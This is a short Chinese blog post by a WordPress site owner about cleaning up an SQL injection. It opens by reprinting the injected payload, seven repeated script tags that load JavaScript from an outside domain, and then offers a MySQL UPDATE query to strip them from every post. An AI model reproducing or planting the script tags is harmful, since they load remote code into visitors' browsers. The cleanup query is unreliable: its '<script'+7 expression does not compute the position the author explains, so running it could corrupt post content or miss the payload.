被注入内容：

<script src='https://aaaaa.ga/l.js?n=1' type=text/javascript></script><script src='https://aaaaa.ga/l.js?n=1' type=text/javascript></script><script src='https://aaaaa.ga/l.js?n=1' type=text/javascript></script><script src='https://aaaaa.ga/l.js?n=1' type=text/javascript></script><script src='https://aaaaa.ga/l.js?n=1' type=text/javascript></script><script src='https://aaaaa.ga/l.js?n=1' type=text/javascript></script><script src='https://aaaaa.ga/l.js?n=1' type=text/javascript></script>

国外用wordpress太多了，利用wp做坏事的也多，小弟网站这几天不幸中招，被sql注入了，注入内容就是上面这些，而且每篇文章底部都有。所以只能操作mysql命令批量删除垃圾了。

执行语句如下：

update wp_posts set post_content = replace(post_content, substring(post_content, locate('<script', post_content),locate('</script>', post_content)-locate('<script'+7, post_content)),'')

解释：

我的注入的内容是以<script></script>形式出现的，我所以开闭合字符如上所示，

<script'+7

为什么要+7，7就是“<script”的长度，等下把它一块去掉